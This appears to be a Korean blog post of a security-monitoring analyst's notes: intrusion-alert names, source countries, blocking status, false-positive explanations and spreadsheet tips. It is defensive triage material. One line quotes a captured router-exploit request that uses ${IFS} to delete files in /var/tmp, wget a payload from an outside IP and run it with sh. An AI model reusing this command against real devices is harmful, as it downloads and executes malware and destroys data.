권과장님 : https://hugoitstory.blogspot.com/
https://yourwebpagehasbeenhacked.blogspot.com
수영씨 : https://are-you-hacker.tistory.com/2
오탐;내부간 공격성 없는 정상통신을 탐지 영향도 없음 오탐처리
오탐 - 내부 배포 파일 오탐지
오탐 - 진단팀 업무 중 IP 오탐지
Unix의 NTP의 ntp-request.c의 취약점을 통한 서비스 거부 트래픽 증폭 시도
VN
신규차단
Unix의 NTP의 ntp-request.c의 취약점을 통한 서비스 거부 트래픽 증폭 시도
NL
기차단
Apache Web서버에 대한 x-Forwarded-for를 통한 DoS 시도
DE
신규차단
Master IP CAM 01 3.3.4.2103 취약점을 이용한 원격코드 실행 시도
IN
신규차단
악성으로 확인된 C&C서버 접근 시도
NL
기차단
Apache Web서버에 대한 x-Forwarded-for를 통한 DoS 시도
US
신규차단
오탐 : 내부 통신간에 발생된 영향도 없는 알람
오탐 : 내부 관제 알람은 관제범위 밖으로, 오탐처리
오탐 : 장비교체로 인한 헬스체크 발생
침해의심행위 탐지 메일 발송
SKBMP WAF SYSLOG 건 합의 중. 임시 오탐처리.
rawdata 확인 불가. 정/오탐 판별 기준 불명확. 관제 영역 협의 미비하여 임시 오탐 처리.
(02/16)(02/19) WAF 트래픽 증가 확인 요청 발송한 내역과 동일 사유로 확인. 현재 원인 파악 프로세스 진행 중.
오탐 - 보안진단 취약점 결과 조치 권고에 따라 웹취약점 보호대상으로 결과 이행 조치 된 내용.
2/15 적용 이후 탐지 트래픽이 증가되게 된 내용. (탐지 로그는 서비스 URI로 오탐 내역)
Unix의 NTP의 ntp-request.c의 취약점을 통한 서비스 거부 트래픽 증폭 시도
BV
기차단
오탐
- 공격성 없는 요청 시도로 판단됨.
- 공격구문 확인 불가
zgrab을 통한 웹 취약점 스캔을 탐지
US
신규차단
D-Link DSL-2750B에 대한 Command Injection 공격 시도
CN
신규차단
Apache Web서버에 대한 x-Forwarded-for를 통한 DoS 시도
신규차단
ThinkPHP의 펑션을 이용한 원격 명령 실행 시도
BR
신규차단
FreeBSD의 리어셈블리 기능을 통한 DoS 시도
US
기차단
악성으로 확인된 C&C서버로 DNS Query 발생
US
기차단
오탐 - 공격 원천지 확인 불가 오탐 처리
OpenVAS Tool을 이용한 스캐닝 시도
RO
기차단
긴급차단
/etc/passwd, /etc/shadow 등 중요한 파일에 대한 접근 시도
US
미차단
MICROSOFT
SKBA
오탐 : 외부에서 근무자가 VDI VPN을 통하여 FA DB서버로 접속하기 위한 시도로 확인됨
SKBMP
오탐 : 근원지(SK-ENGINEERING-CONSTRUCTION)에서 정상적인 접속 시도로 판단됨
디렉토리 이동을 위한 ../../../ 를 활용하여 임의의 파일 Read 시도
US
신규차단
오탐 : 장비 접속 이상 없음, 오탐 처리
(PHISH.URL) 악성으로 확인된 URL 접근 시도 ; ; 신규차단
Spring4Shell 취약점을 이용한 원격코드 실행 시도
디렉토리 이동을 위한 ../../../ 를 활용하여 임의의 파일 Read 시도
<jaws>
MVPower DVR의 Shell 명령어 취약점을 이용한 원격코드 실행 시도
CN
신규차단
MVPower DVR의 Shell 명령어 취약점을 이용한 원격코드 실행 시도
US
미차단
AMAZON
Web Server의 Hash Table 취약점을 통한 DoS 시도
KR
미차단
KT
<netgear>
NETGEAR 공유기 취약점을 이용한 원격코드 실행 시도
CN
신규차단
<2750B>
D-Link DSL-2750B에 대한 Command Injection 공격 시도
CN
신규차단
<gponform>
Dasan GPON의 ?images 취약점을 통한 인증 우회 공격 시도
CN
신규차단
오탐: 중복 탐지 룰에 대한 알람 발생으로 인한 오탐 처리
Apache HTTP 서버에 Range 헤더를 통한 DoS 시도; UA; 미차단
초고속 MSDEFENDER 확인법
조건부 서식 -> 셀 강조 -> 텍스트 포함
2번 반복
자동화된 Tool을 이용한 스캐닝 시도
CN
차단예정
오탐 : 장비 접속 이상 없음, 오탐 처리
SEP(AP)
SKI서산충방전기관리시스템 : 가용성 이상 없음 오탐 처리
오탐 - 신규 WAF 장비 등록 완료 및 로그 미유입으로 인한 헬스체크 발생
(이상 해외 자산) : 오탐 : 해외법인 자산 연동 작업으로 인한 감사로그 발생
sip ----차단예정.
OpenVAS Tool을 이용한 스캐닝 시도 ; US ; 차단
자동화된 Tool을 이용한 스캐닝 시도 ; DE ; 차단예정
TCP connetion Flooding DoS 공격 ; UA ; 차단예정
+x-forwarded-for
Apache Web서버에 대한 x-Forwarded-for를 통한 DoS 시도; ; 미차단
오탐: 공격구문 확인 불가. 문자열 패턴 매칭에 의한 오탐지.
자동화된 Tool을 이용한 스캐닝 시도
OpenVAS Tool을 이용한 스캐닝 시도 ; RU ; 차단예정
GET /CGI-BIN/<B10>;CD${IFS}/VAR/TMP;RM${IFS}-RF${IFS}*;${IFS}WGET${IFS}HTTP://205.185.126.27/NETGEAR2;${IFS}SH${IFS}/VAR/TMP/NETGEAR2</B10>"
( x x x DrayTek Vigor 제품군 취약점을 이용한 원격코드 실행 시도 ---> NETGEAR )
FreeBSD의 리어셈블리 기능을 통한 DoS 시도 ; US ; 미차단
접근권한 취약점을 이용한 WordPress 시스템파일 접근 시도
WordPress 취약점을 이용한 시스템파일 접근 시도
=A16&"/32"
(대역대 변환기 함수)
https://www.mailsware.com/msg-converter.html
Mailsware MSG Converter Toolkit
Comments
Post a Comment